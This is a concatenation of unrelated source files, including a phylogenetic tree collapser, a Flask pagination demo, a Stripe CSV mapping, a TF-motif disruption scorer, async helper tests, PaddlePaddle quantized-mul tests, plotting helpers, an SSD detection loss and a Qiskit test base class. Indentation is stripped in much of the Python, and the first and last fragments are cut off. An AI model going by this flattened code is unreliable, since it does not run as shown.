x = i['X']
y = i['Y']
tid = i['TID']
for card_id in card_ids:
card_list = cards[card_id]
for card in card_list:
sid.append(card.sid)
j.append(card.j)
k.append(card.k)
x.append(card.x)
y.append(card.y)
tid.append(card.tid)
return result
|
the-stack_106_23232 | #!/usr/local/env python3
__author__ = 'duceppemo'
__version__ = '0.1'
"""
https://www.biostars.org/p/97409/
"""
from ete3 import Tree
from argparse import ArgumentParser
class TreeCollapser(object):
def __init__(self, args):
# Arguments
self.input_tree = args.input
self.output_tree = args.output
self.dist = args.distance
# Run
self.run()
def run(self):
# Parse tree file (Newick format)
t = Tree(self.input_tree)
# Now collapse nodes with distance smaller than
TreeCollapser.collapse(t, self.dist)
# Collapsed nodes are labeled, so you locate them and prune them
for node in t.search_nodes(collapsed=True):
for child in node.get_children():
child.detach()
# Write new collapsed tree to file
t.write(format=1, outfile=self.output_tree)
@staticmethod
def mean(array):
return sum(array)/float(len(array))
@staticmethod
def cache_distances(tree):
"""
precalculate distances of all nodes to the root
"""
node2rootdist = {tree: 0}
for node in tree.iter_descendants('preorder'):
node2rootdist[node] = node.dist + node2rootdist[node.up]
return node2rootdist
@staticmethod
def collapse(tree, min_dist):
# cache the tip content of each node to reduce the number of times the tree is traversed
node2tips = tree.get_cached_content()
root_distance = TreeCollapser.cache_distances(tree)
for node in tree.get_descendants('preorder'):
if not node.is_leaf():
avg_distance_to_tips = TreeCollapser.mean([root_distance[tip]-root_distance[node]
for tip in node2tips[node]])
if avg_distance_to_tips < min_dist:
# do whatever, ete support node annotation, deletion, labeling, etc.
# rename
# node.name += ' COLLAPSED avg_d:%g {%s}' %(avg_distance_to_tips,
# ','.join([tip.name for tip in node2tips[node]]))
node.name += '%s {%s}' % ([tip.name for tip in node2tips[node]][0],
','.join([tip.name for tip in node2tips[node]][1:]))
# label
node.add_features(collapsed=True)
# set drawing attribute so they look collapsed when displayed with tree.show()
node.img_style['draw_descendants'] = False
if __name__ == '__main__':
    parser = ArgumentParser(description='Collapse internal nodes of a Newick tree whose average '
                                        'distance to their tips is below a given threshold')
parser.add_argument('-i', '--input', metavar='sample.tree',
required=True,
help='Newick input tree')
parser.add_argument('-o', '--output', metavar='sample_collapsed.tree',
required=True,
help='Newick output tree')
parser.add_argument('-d', '--distance', metavar='0.01', type=float,
required=True,
help='Distance threshold. Nodes with distance smaller than this value will be collapsed.')
# Get the arguments into an object
arguments = parser.parse_args()
TreeCollapser(arguments)
|
the-stack_106_23233 | import random
from flask import Flask
from flask_restful import Api, Resource
from flask_rest_paginate import Pagination
from marshmallow import Schema, fields
"""
Initialize the app
"""
app = Flask(__name__)
api = Api(app)
# Possible configurations for Paginate
# app.config['PAGINATE_PAGE_SIZE'] = 20
# app.config['PAGINATE_PAGE_PARAM'] = "pagenumber"
# app.config['PAGINATE_SIZE_PARAM'] = "pagesize"
# app.config['PAGINATE_RESOURCE_LINKS_ENABLED'] = False
pagination = Pagination(app)
class CalculationSchema(Schema):
calculation_time = fields.Str()
value = fields.Str()
"""
Controllers
"""
class CalculationList(Resource):
def get(self):
"""
Simulates a computation that needs to be
performed by a backend service.
:return:
"""
import time
def largest_prime_factor(n):
"""
Returns the largest prime factor of a number
:param n:
:return: The largest prime factor of a number
"""
i = 2
while i * i <= n:
if n % i:
i += 1
else:
n //= i
return n
result_list = []
for i in range(100):
start = time.time()
# prime = largest_prime_factor(random.randint(100000, 200000))
result_list.append({"calculation_time": time.time() - start, "value": i})
tmp = pagination.paginate(result_list, CalculationSchema(many=True), marshmallow=True)
return tmp
"""
Register the resources
"""
api.add_resource(CalculationList, '/calculation')
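# Example request once the app is running (the query parameter names below are
# assumed library defaults; they change if the commented PAGINATE_*_PARAM
# settings above are enabled):
#   GET http://localhost:5000/calculation?page=2&size=10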
"""
Run the app
"""
if __name__ == '__main__':
app.run(debug=True) |
the-stack_106_23234 | # -*- coding: utf-8 -*-
# vim: sw=4:ts=4:expandtab
# pylint: disable=invalid-name
"""
csv2ofx.mappings.stripe
~~~~~~~~~~~~~~~~~~~~~~~~
Provides a mapping for transactions obtained via Stripe card processing
Note that Stripe provides a Default set of columns or you can download
All columns. (as well as custom). The Default set does not include card
information, so provides no appropriate value for the PAYEE field for
an anonymous transaction (missing a customer).
It's suggested the All Columns format be used if not all transactions
identify a customer. This mapping sets PAYEE to Customer Name if it
exists, otherwise Card Name (if provided)
"""
from operator import itemgetter
mapping = {
"has_header": True,
"account": "Stripe",
"id": itemgetter("id"),
"date": itemgetter("created"),
"amount": itemgetter("amount"),
"currency": itemgetter("currency"),
"payee": lambda tr: tr.get("customer_description")
if len(tr.get("customer_description")) > 0
else tr.get("card_name", ""),
"desc": itemgetter("description"),
}
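# Illustrative row (keys follow the Stripe "All columns" export assumed above;
# the values are made up):
# row = {
#     "id": "ch_123", "created": "2021-01-01 00:00", "amount": "10.00",
#     "currency": "usd", "description": "Order 42",
#     "customer_description": "", "card_name": "Jane Doe",
# }
# mapping["payee"](row)  # -> "Jane Doe" (falls back to card_name because the
#                        #    customer description is empty)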
|
the-stack_106_23235 | import pandas as pd
def _filter_variant_motif_res(
motif_res,
variant_start,
variant_end,
motif_length,
seq,
):
"""
Remove MOODS motif hits that don't overlap the variant of interest.
Parameters
----------
motif_res : list
Result from MOODS search like [(21, 3.947748787969809), (-38,
3.979759977155675)].
variant_start : int
Relative start position of the allele string in seq (not genomic
coordinates). In other words, seq[variant_start:variant_end] should
give the allele.
variant_end : int
Relative end position of the allele string in seq (not genomic
coordinates). In other words, seq[variant_start:variant_end] should
give the allele.
motif_length : int
Length of the motif.
seq : str
Sequence searched for motifs for this allele.
Returns
-------
motif_res : list
List in the same format as motif_res input but with entries that don't
overlap the variant removed.
"""
import MOODS
remove = []
for r in motif_res:
motif_start = r[0]
motif_end = r[0] + motif_length
if r[0] < 0:
motif_start += len(seq)
motif_end += len(seq)
if motif_end <= variant_start or motif_start >= variant_end:
remove.append(r)
motif_res = list(set(motif_res) - set(remove))
return motif_res
def find_motif_disruptions(
position,
ref,
alt,
genome_fasta,
matrices,
):
"""
Determine whether there is a difference between the ref and alt
alleles for TF binding. Requires samtools in your path.
Parameters
----------
position : str
Zero based genomic coordinates of the reference allele of the form
chrom:start-end (chr5:100-101 for a SNV for instance). The value end -
start should equal the length of the ref allele.
ref : str
Reference allele. This should match the reference sequence at "position"
in genome_fasta.
alt : str
Alternate allele.
genome_fasta : str
Path to genome fasta file. This file should be indexed.
matrices : dict
Dict whose keys are motif names and whose values are pandas data frames
or numpy arrays containing PWMs with columns ACGT.
Returns
-------
out : pandas.DataFrame
Pandas data frame with motifs whose best matches that overlapped the
variant differed between the reference and alternate sequences. A score
of zero and a strand of '' indicates that there was not a match for the
motif on the given allele.
"""
import subprocess
import MOODS
# import pybedtools as pbt
max_motif_length = max([x.shape[0] for x in matrices.values()])
chrom, coords = position.split(':')
start,end = [int(x) for x in coords.split('-')]
s = '{}:{}-{}'.format(chrom, start - max_motif_length + 1, end +
max_motif_length - 1)
c = 'samtools faidx {} {}'.format(genome_fasta, s)
seq_lines = subprocess.check_output(c, shell=True).strip().split()
ref_seq = seq_lines[1]
alt_seq = ref_seq[0:max_motif_length - 1] + alt + ref_seq[max_motif_length + len(ref) - 1:]
ref_variant_start = max_motif_length - 1
ref_variant_end = max_motif_length - 1 + len(ref)
alt_variant_start = max_motif_length - 1
alt_variant_end = max_motif_length - 1 + len(alt)
ms = [matrices[x].T.values.tolist() for x in matrices.keys()]
ref_res = MOODS.search(ref_seq, ms, 0.001, both_strands=True,
bg=[0.25, 0.25, 0.25, 0.25])
ref_res = dict(zip(matrices.keys(), ref_res))
alt_res = MOODS.search(alt_seq, ms, 0.001, both_strands=True,
bg=[0.25, 0.25, 0.25, 0.25])
alt_res = dict(zip(matrices.keys(), alt_res))
# First we'll remove any motif matches that don't overlap the variant of interest (and thus
# can't be affected by the variant and will be the same for ref and alt). Then we'll get the
# best match for each motif for ref and alt.
rows = []
for motif in ref_res.keys():
ref_res[motif] = _filter_variant_motif_res(ref_res[motif], ref_variant_start, ref_variant_end,
matrices[motif].shape[0], ref_seq)
alt_res[motif] = _filter_variant_motif_res(alt_res[motif], alt_variant_start, alt_variant_end,
matrices[motif].shape[0], alt_seq)
if len(ref_res[motif]) > 0:
ref_pos, ref_score = sorted(ref_res[motif], key=lambda x: x[1], reverse=True)[0]
ref_strand = {True:'+', False:'-'}[ref_pos > 0]
else:
ref_score = 0
ref_strand = ''
if len(alt_res[motif]) > 0:
alt_pos, alt_score = sorted(alt_res[motif], key=lambda x: x[1], reverse=True)[0]
alt_strand = {True:'+', False:'-'}[alt_pos > 0]
else:
alt_score = 0
alt_strand = ''
if ref_score > 0 or alt_score > 0:
diff = ref_score - alt_score
rows.append([motif, ref_score, ref_strand, alt_score, alt_strand, diff])
out = pd.DataFrame(rows, columns=['motif', 'ref_score', 'ref_strand', 'alt_score',
'alt_strand', 'score_diff'])
out.index = out.motif
out = out.drop('motif', axis=1)
out = out[out.score_diff != 0]
return out
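# Illustrative call (file names, motif name, and PWM values are hypothetical;
# requires samtools on the PATH and the MOODS package):
# pwm = pd.DataFrame([[0.1, 0.2, 0.3, 0.4]] * 8, columns=list('ACGT'))
# hits = find_motif_disruptions('chr5:100-101', 'A', 'T', 'hg19.fa', {'MOTIF1': pwm})
# print(hits.sort_values('score_diff'))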
|
the-stack_106_23236 | import time
import asyncio
import contextlib
from appyter.ext.asyncio import helpers
from appyter.ext.itertools import alist
import logging
logger = logging.getLogger(__name__)
import pytest
from appyter.ext.pytest import assert_eq, assert_exc
from appyter.ext.asyncio.event_loop import with_event_loop
@pytest.fixture(scope="session", autouse=True)
def event_loop_fixture():
with with_event_loop():
yield
@contextlib.asynccontextmanager
async def asyncctx(a, *, b=1):
await asyncio.sleep(0.1)
yield a+b
async def asyncgenfun(a, *, b=1):
yield a
await asyncio.sleep(0.1)
yield a+b
async def asyncfun(a, *, b=1):
await asyncio.sleep(0.1)
return a+b
@contextlib.contextmanager
def syncctx(a, *, b=1):
time.sleep(0.1)
yield a+b
def syncgenfun(a, *, b=1):
yield a
time.sleep(0.1)
yield a+b
def syncfun(a, *, b=1):
time.sleep(0.1)
return a+b
async def async_mixedfun(a, *, b=1):
return await helpers.ensure_async(syncfun(a, b=b))
def sync_exc():
logger.info("Sync: Raising Runtime Error")
raise RuntimeError()
async def async_exc():
logger.info("Async: Raising Runtime Error")
raise RuntimeError()
def test_ensure_sync_async_ctx():
with helpers.ensure_sync(asyncctx(1)) as ctx: assert_eq(ctx, 2)
with helpers.ensure_sync(asyncctx)(0,b=2) as ctx: assert_eq(ctx, 2)
def test_ensure_sync_async_gen():
assert_eq(list(helpers.ensure_sync(asyncgenfun)(1)), [1,2])
assert_eq(list(helpers.ensure_sync(asyncgenfun(0,b=2))), [0,2])
def test_ensure_sync_async_fun():
assert_eq(helpers.ensure_sync(asyncfun)(1), 2)
assert_eq(helpers.ensure_sync(asyncfun(0,b=2)), 2)
def test_ensure_sync_async_exc():
with assert_exc(RuntimeError):
helpers.ensure_sync(async_exc)()
def test_ensure_sync_sync_ctx():
i = 0
with helpers.ensure_sync(syncctx(1)) as ctx:
assert_eq(ctx, 2)
i += 1
with helpers.ensure_sync(syncctx)(0,b=2) as ctx:
assert_eq(ctx, 2)
i += 1
assert_eq(i, 2)
def test_ensure_sync_sync_gen():
assert_eq(list(helpers.ensure_sync(syncgenfun)(1)), [1,2])
assert_eq(list(helpers.ensure_sync(syncgenfun(0,b=2))), [0,2])
def test_ensure_sync_sync_fun():
assert_eq(helpers.ensure_sync(syncfun)(1), 2)
assert_eq(helpers.ensure_sync(syncfun(0,b=2)), 2)
def test_ensure_sync_sync_exc():
with assert_exc(RuntimeError):
helpers.ensure_sync(sync_exc)()
def test_ensure_sync_mixed_fun():
assert_eq(helpers.ensure_sync(async_mixedfun(0,b=2)), 2)
async def _test_ensure_async_async_ctx():
i = 0
async with helpers.ensure_async(asyncctx(1)) as ctx:
i += 1
assert_eq(ctx, 2)
# Not supported
# async with helpers.ensure_async(asyncctx)(0,b=2) as ctx: assert_eq(ctx, 2)
assert_eq(i, 1)
def test_ensure_async_async_ctx():
helpers.ensure_sync(_test_ensure_async_async_ctx)()
async def _test_ensure_async_async_gen():
assert_eq(await alist(helpers.ensure_async(asyncgenfun)(1)), [1,2])
assert_eq(await alist(helpers.ensure_async(asyncgenfun(0,b=2))), [0,2])
def test_ensure_async_async_gen():
helpers.ensure_sync(_test_ensure_async_async_gen)()
async def _test_ensure_async_async_fun():
assert_eq(await helpers.ensure_async(asyncfun)(1), 2)
assert_eq(await helpers.ensure_async(asyncfun(0,b=2)), 2)
def test_ensure_async_async_fun():
helpers.ensure_sync(_test_ensure_async_async_fun)()
async def _test_ensure_async_async_exc():
with assert_exc(RuntimeError):
await helpers.ensure_async(async_exc)()
def test_ensure_async_async_exc():
helpers.ensure_sync(_test_ensure_async_async_exc)()
async def _test_ensure_async_sync_ctx():
i = 0
async with helpers.ensure_async(syncctx(1)) as ctx:
i += 1
assert_eq(ctx, 2)
# Not supported
# async with helpers.ensure_async(syncctx)(0,b=2) as ctx: assert_eq(ctx, 2)
assert_eq(i, 1)
def test_ensure_async_sync_ctx():
helpers.ensure_sync(_test_ensure_async_sync_ctx)()
async def _test_ensure_async_sync_gen():
assert_eq(await alist(helpers.ensure_async(syncgenfun)(1)), [1,2])
assert_eq(await alist(helpers.ensure_async(syncgenfun(0,b=2))), [0,2])
def test_ensure_async_sync_gen():
helpers.ensure_sync(_test_ensure_async_sync_gen)()
async def _test_ensure_async_sync_fun():
assert_eq(await helpers.ensure_async(syncfun)(1), 2)
assert_eq(await helpers.ensure_async(syncfun(0,b=2)), 2)
def test_ensure_async_sync_fun():
helpers.ensure_sync(_test_ensure_async_sync_fun)()
async def _test_ensure_async_sync_exc():
with assert_exc(RuntimeError):
await helpers.ensure_async(sync_exc)()
def test_ensure_async_sync_exc():
helpers.ensure_sync(_test_ensure_async_sync_exc)()
async def _test_ensure_async_mixed_fun():
assert_eq(await helpers.ensure_async(async_mixedfun(0,b=2)), 2)
def test_ensure_async_mixed_fun():
helpers.ensure_sync(_test_ensure_async_mixed_fun)()
async def _test_async_sync_bottom_up_exc():
try:
await helpers.ensure_async(sync_exc)()
except RuntimeError as e:
assert isinstance(e, RuntimeError)
logger.info(f"Async: Received {repr(e)}, Re-raising")
raise
def test_async_sync_bottom_up_exc():
with assert_exc(RuntimeError):
logger.info("Starting async_sync_exc")
helpers.ensure_sync(_test_async_sync_bottom_up_exc)()
logger.info("Done.")
@contextlib.asynccontextmanager
async def _test_async_sync_top_down_exc():
try:
yield
except KeyboardInterrupt as e:
assert isinstance(e, KeyboardInterrupt)
logger.info(f"Async: Received {repr(e)}, Re-raising")
raise
def test_async_sync_top_down_exc():
with assert_exc(KeyboardInterrupt):
with helpers.ensure_sync(_test_async_sync_top_down_exc()):
time.sleep(0.5)
raise KeyboardInterrupt
def test_async_sync_async_ctx():
class MyAsynCls:
def __init__(self):
logger.debug("MyAsynCls()")
async def __aenter__(self):
logger.debug("MyAsynCls.__aenter__")
await asyncio.sleep(0.1)
return self
async def __aexit__(self, *args):
logger.debug("MyAsynCls.__aexit__")
await asyncio.sleep(0.1)
class MySynCls:
def __init__(self):
logger.debug("MySynCls()")
self.asyn = MyAsynCls()
def __enter__(self):
logger.debug("MySynCls.__enter__")
helpers.ensure_sync(self.asyn.__aenter__())
time.sleep(0.1)
def __exit__(self, *args):
helpers.ensure_sync(self.asyn.__aexit__(*args))
time.sleep(0.1)
logger.debug("MySynCls.__exit__")
async def _test():
syn = MySynCls()
logger.debug("with MySynCls")
# with syn: # NOTE: this would cause a hang
async with helpers.ensure_async(syn):
logger.debug("entered")
await asyncio.sleep(0.1)
logger.debug("exited")
helpers.ensure_sync(_test())
|
the-stack_106_23237 | # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
import paddle
import paddle.fluid.core as core
from paddle.fluid.tests.unittests.op_test import OpTest, skip_check_grad_ci
'''
test case for s8 * s8
'''
@skip_check_grad_ci(
reason=
"mul_mkldnn_op does not implement grad operator, check_grad is not required."
)
class TestMKLDNNMulOpS8S8(OpTest):
def setUp(self):
self.op_type = "mul"
self.init_kernel_type()
self.init_data_type()
self.init_data()
self.attrs = {
"use_mkldnn": self.use_mkldnn,
"scale_x": self.scale_x,
"scale_y": self.scale_y,
"scale_out": self.scale_out,
"force_fp32_output": self.force_fp32,
}
def init_kernel_type(self):
self.use_mkldnn = True
self.force_fp32 = True
def init_data_type(self):
self.srctype = np.uint8
self.dsttype = np.float32 if self.force_fp32 else np.int8
def init_data(self):
self.scale_x = 0.6
self.scale_y = [0.8]
self.scale_out = 1.0
# limit random range inside |-127, 127| to avoid overflow on SKL
if self.srctype == np.int8:
A_data = np.random.randint(-127, 127, (20, 5)).astype(np.int8)
else:
A_data = np.random.randint(0, 127, (20, 5)).astype(np.uint8)
B_data = np.random.uniform(-127, 127, (5, 20)).astype(np.float32)
quant_B = np.round(B_data * self.scale_y[0]).astype(np.int_)
output = np.dot(A_data, quant_B)
scale_output_shift = (self.scale_out) / \
(self.scale_x * self.scale_y[0])
if (self.force_fp32):
output = (output * scale_output_shift).astype(self.dsttype)
else:
output = np.round(output * scale_output_shift).astype(self.dsttype)
self.inputs = {'X': A_data, 'Y': B_data}
self.outputs = {'Out': output}
def test_check_output(self):
# TODO(wangzhongpu): support mkldnn op in dygraph mode
self.check_output_with_place(core.CPUPlace(),
atol=0,
check_dygraph=False)
'''
test case for s8 * u8
'''
class TestMKLDNNMulOpS8U8(TestMKLDNNMulOpS8S8):
def init_data_type(self):
self.srctype = np.uint8
self.dsttype = np.float32 if self.force_fp32 else np.int8
'''
test case for s8 * s8
'''
class TestMKLDNNMulOpS8S8WithFlatten(TestMKLDNNMulOpS8S8):
def setUp(self):
self.op_type = "mul"
self.init_kernel_type()
self.init_data_type()
self.init_data()
self.attrs = {
"use_mkldnn": self.use_mkldnn,
"scale_x": self.scale_x,
"scale_y": self.scale_y,
"scale_out": self.scale_out,
"force_fp32_output": self.force_fp32,
"x_num_col_dims": 2,
"y_num_col_dims": 2,
}
def init_data(self):
self.scale_x = 0.6
self.scale_y = [0.8]
self.scale_out = 1.0
# limit random range inside |-127, 127| to avoid overflow on SKL
if self.srctype == np.int8:
A_data = np.random.randint(-127, 127, (3, 4, 4, 3)).astype(np.int8)
else:
A_data = np.random.randint(0, 127, (3, 4, 4, 3)).astype(np.uint8)
B_data = np.random.uniform(-127, 127,
(2, 6, 1, 2, 3)).astype(np.float32)
A_data_reshape = A_data.reshape(3 * 4, 4 * 3)
B_data_reshape = B_data.reshape(2 * 6, 1 * 2 * 3)
quant_B = np.round(B_data_reshape * self.scale_y[0]).astype(np.int_)
output = np.dot(A_data_reshape, quant_B)
scale_output_shift = (self.scale_out) / \
(self.scale_x * self.scale_y[0])
if (self.force_fp32):
output = (output * scale_output_shift).astype(self.dsttype)
else:
output = np.round(output * scale_output_shift).astype(self.dsttype)
output = output.reshape(3, 4, 1, 2, 3)
self.inputs = {'X': A_data, 'Y': B_data}
self.outputs = {'Out': output}
'''
test case for s8 * u8
'''
class TestMKLDNNMulOpS8U8WithFlatten(TestMKLDNNMulOpS8S8WithFlatten):
def init_data_type(self):
self.srctype = np.uint8
self.dsttype = np.float32 if self.force_fp32 else np.int8
if __name__ == '__main__':
paddle.enable_static()
unittest.main()
|
the-stack_106_23239 | import numpy as np
import matplotlib.pylab as plt
import cv2
from skimage.metrics import structural_similarity as ssim
from skimage.metrics import peak_signal_noise_ratio as psnr
import os
from os.path import join as opj
from os.path import dirname as opd
from tqdm import tqdm
def plot(img,title="",savename="",savedir=None):
plt.figure()
plt.title(title)
plt.imshow(img,vmax=img.max(),vmin=0)
if savedir!=None:
plt.savefig(opj(savedir,savename+'.png'),dpi=200)
else:
plt.show()
plt.close()
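# Illustrative usage of plot() (the array below is made up):
# img = np.random.rand(64, 64)
# plot(img, title="demo")                                   # display only
# plot(img, title="demo", savename="demo", savedir="figs")  # writes figs/demo.png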
def plot12(img1,img2,title1="",title2="",title="",savename="",savedir=None):
fig = plt.figure()
fig.suptitle(title)
plt.subplot(121)
plt.title(title1)
plt.imshow(img1,vmax=img1.max(),vmin=0)
plt.subplot(122)
plt.title(title2)
plt.imshow(img2,vmax=img2.max(),vmin=0)
if savedir!=None:
plt.savefig(opj(savedir,savename+'.png'),dpi=200)
else:
plt.show()
plt.close()
def plot_hist(array,bins=None,title='',savename="",savedir=None):
plt.figure()
plt.title(title)
if bins!=None:
plt.hist(array,bins=bins)
else:
plt.hist(array)
if savedir!=None:
plt.savefig(opj(savedir,savename+'.png'),dpi=200)
else:
plt.show()
plt.close()
def plot_matrix(matrix,cmap='viridis_r',vmin=None,vmax=None,text=False,title='',savename="",savedir=None):
plt.figure(figsize=(20,20))
plt.title(title)
if vmin!=None and vmax!=None:
plt.imshow(matrix,cmap=cmap,vmin=vmin,vmax=vmax)
else:
plt.imshow(matrix,cmap=cmap)
plt.colorbar(shrink=0.8)
if text:
for i in range(matrix.shape[0]):
for j in range(matrix.shape[1]):
plt.text(j, i, "{:.2f}".format(matrix[i, j]),
ha="center", va="center", color="w",size=8)
if savedir!=None:
plt.savefig(opj(savedir,savename+'.png'),dpi=200)
else:
plt.show()
plt.close()
def plot_boxplot(array,showfliers=True,whis=1.5,flierprops=None,title='',savename="",savedir=None):
plt.figure()
plt.title(title)
plt.boxplot(array,showfliers=showfliers,whis=whis,flierprops=flierprops)
if savedir!=None:
plt.savefig(opj(savedir,savename+'.png'),dpi=200)
else:
plt.show()
plt.close()
def plot12_boxplot(array1,array2,showfliers=True,whis=1.5,flierprops=None,
title1="",title2="",title="",savename="",savedir=None):
fig = plt.figure()
fig.suptitle(title)
plt.subplot(121)
plt.title(title1)
plt.boxplot(array1,showfliers=showfliers,whis=whis,flierprops=flierprops)
plt.subplot(122)
plt.title(title2)
plt.boxplot(array2,showfliers=showfliers,whis=whis,flierprops=flierprops)
if savedir!=None:
plt.savefig(opj(savedir,savename+'.png'),dpi=200)
else:
plt.show()
plt.close() |
the-stack_106_23241 | # Copyright (c) 2018-2019, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import torch
class OptLoss(torch.jit.ScriptModule):
"""
Implements the loss as the sum of the followings:
1. Confidence Loss: All labels, with hard negative mining
2. Localization Loss: Only on positive labels
Suppose input dboxes has the shape 8732x4
"""
__constants__ = ['scale_xy', 'scale_wh', 'dboxes_xy', 'dboxes_wh']
def __init__(self, dboxes):
super(OptLoss, self).__init__()
self.scale_xy = 1.0/dboxes.scale_xy
self.scale_wh = 1.0/dboxes.scale_wh
self.sl1_loss = torch.nn.SmoothL1Loss(reduce=False)
self.dboxes = torch.nn.Parameter(dboxes(order="xywh").transpose(0, 1).unsqueeze(dim = 0),
requires_grad=False)
self.register_buffer('dboxes_xy', self.dboxes[:, :2, :])
self.register_buffer('dboxes_wh', self.dboxes[:, 2:, :])
self.dboxes_xy.requires_grad = False
self.dboxes_wh.requires_grad = False
# Two factor are from following links
# http://jany.st/post/2017-11-05-single-shot-detector-ssd-from-scratch-in-tensorflow.html
self.con_loss = torch.nn.CrossEntropyLoss(reduce=False)
@torch.jit.script_method
def _loc_vec(self, loc):
"""
Generate Location Vectors
"""
# loc_wh, loc_xy = loc[:, :2, :], loc[:, 2:, :]
gxy = self.scale_xy*(loc[:, :2, :] - self.dboxes_xy) / self.dboxes_wh
# gxy = self.scale_xy*(loc[:, :2, :] - self.dboxes[:, :2, :])/self.dboxes[:, 2:, ]
gwh = self.scale_wh*(loc[:, 2:, :] / self.dboxes_wh).log()
# gwh = self.scale_wh*(loc[:, 2:, :]/self.dboxes[:, 2:, :]).log()
#print(gxy.sum(), gwh.sum())
return torch.cat((gxy, gwh), dim=1).contiguous()
@torch.jit.script_method
def forward(self, ploc, plabel, gloc, glabel):
"""
ploc, plabel: Nx4x8732, Nxlabel_numx8732
predicted location and labels
gloc, glabel: Nx4x8732, Nx8732
ground truth location and labels
"""
mask = glabel > 0
pos_num = mask.sum(dim=1)
vec_gd = self._loc_vec(gloc)
# sum on four coordinates, and mask
sl1 = self.sl1_loss(ploc, vec_gd).sum(dim=1)
sl1 = (mask.type_as(sl1) * sl1).sum(dim=1)
# hard negative mining
con = self.con_loss(plabel, glabel)
# postive mask will never selected
con_neg = con.clone()
# con_neg[mask] = 0
con_neg.masked_fill_(mask, 0)
# con_neg[con_neg!=con_neg] = 0
con_neg.masked_fill_(con_neg!=con_neg, 0)
con_s, con_idx = con_neg.sort(dim=1, descending=True)
r = torch.arange(0, con_neg.size(1), dtype=torch.long, device='cuda').expand(con_neg.size(0), -1)
con_rank = r.scatter(1, con_idx, r)
# number of negative three times positive
neg_num = torch.clamp(3*pos_num, max=mask.size(1)).unsqueeze(-1)
neg_mask = con_rank < neg_num
closs = (con*(mask.type_as(con_s) + neg_mask.type_as(con_s))).sum(dim=1)
# avoid no object detected
total_loss = sl1 + closs
num_mask = (pos_num > 0).type_as(closs)
pos_num = pos_num.type_as(closs).clamp(min=1e-6)
ret = (total_loss * num_mask / pos_num).mean(dim=0)
return ret
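# Minimal usage sketch (shapes follow the forward() docstring; `dboxes` is assumed to be
# the SSD default-box helper used above, exposing scale_xy/scale_wh and returning an
# 8732x4 tensor for dboxes(order="xywh")):
# loss_fn = OptLoss(dboxes).cuda()            # forward() allocates an index tensor on 'cuda'
# loss = loss_fn(ploc, plabel, gloc, glabel)  # ploc: Nx4x8732, plabel: Nxlabel_numx8732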
|
the-stack_106_23243 | # -*- coding: utf-8 -*-
# Copyright 2018 IBM.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""Shared functionality and helpers for the unit tests."""
from enum import Enum
import inspect
import logging
import os
import unittest
from qiskit_aqua_chemistry import __path__ as qiskit_aqua_chemistry_path
TRAVIS_FORK_PULL_REQUEST = False
if os.getenv('TRAVIS_PULL_REQUEST_SLUG'):
if os.getenv('TRAVIS_REPO_SLUG') != os.getenv('TRAVIS_PULL_REQUEST_SLUG'):
TRAVIS_FORK_PULL_REQUEST = True
class Path(Enum):
"""Helper with paths commonly used during the tests."""
# Main SDK path: qiskit_aqua_chemistry/
SDK = qiskit_aqua_chemistry_path[0]
# test.python path: test/
TEST = os.path.dirname(__file__)
class QiskitAquaChemistryTestCase(unittest.TestCase):
"""Helper class that contains common functionality."""
SLOW_TEST = int(os.getenv('SLOW_TEST','0'))
@classmethod
def setUpClass(cls):
cls.moduleName = os.path.splitext(inspect.getfile(cls))[0]
cls.log = logging.getLogger(cls.__name__)
# Set logging to file and stdout if the LOG_LEVEL environment variable
# is set.
if os.getenv('LOG_LEVEL'):
# Set up formatter.
log_fmt = ('{}.%(funcName)s:%(levelname)s:%(asctime)s:'
' %(message)s'.format(cls.__name__))
formatter = logging.Formatter(log_fmt)
# Set up the file handler.
log_file_name = '%s.log' % cls.moduleName
file_handler = logging.FileHandler(log_file_name)
file_handler.setFormatter(formatter)
cls.log.addHandler(file_handler)
# Set the logging level from the environment variable, defaulting
# to INFO if it is not a valid level.
level = logging._nameToLevel.get(os.getenv('LOG_LEVEL'),
logging.INFO)
cls.log.setLevel(level)
@staticmethod
def _get_resource_path(filename, path=Path.TEST):
""" Get the absolute path to a resource.
Args:
filename (string): filename or relative path to the resource.
path (Path): path used as relative to the filename.
Returns:
str: the absolute path to the resource.
"""
return os.path.normpath(os.path.join(path.value, filename))
def assertNoLogs(self, logger=None, level=None):
"""The opposite to assertLogs.
"""
# pylint: disable=invalid-name
return _AssertNoLogsContext(self, logger, level)
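# Illustrative subclass (hypothetical test module) showing how the helpers above are used:
# class TestExample(QiskitAquaChemistryTestCase):
#     def test_something(self):
#         data_file = self._get_resource_path('test_data.hdf5')  # resolved under test/
#         with self.assertNoLogs('qiskit_aqua_chemistry', logging.WARNING):
#             pass  # code under test that must not log at WARNING or above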
class _AssertNoLogsContext(unittest.case._AssertLogsContext):
"""A context manager used to implement TestCase.assertNoLogs()."""
LOGGING_FORMAT = "%(levelname)s:%(name)s:%(message)s"
# pylint: disable=inconsistent-return-statements
def __exit__(self, exc_type, exc_value, tb):
"""
This is a modified version of unittest.case._AssertLogsContext.__exit__(...)
"""
self.logger.handlers = self.old_handlers
self.logger.propagate = self.old_propagate
self.logger.setLevel(self.old_level)
if exc_type is not None:
# let unexpected exceptions pass through
return False
for record in self.watcher.records:
self._raiseFailure(
"Something was logged in the logger %s by %s:%i" %
(record.name, record.pathname, record.lineno))
|
the-stack_106_23244 | #cpu time 0.03s
all_times = []
while True:
i = input()
if i == '0':
# let's end with the final output
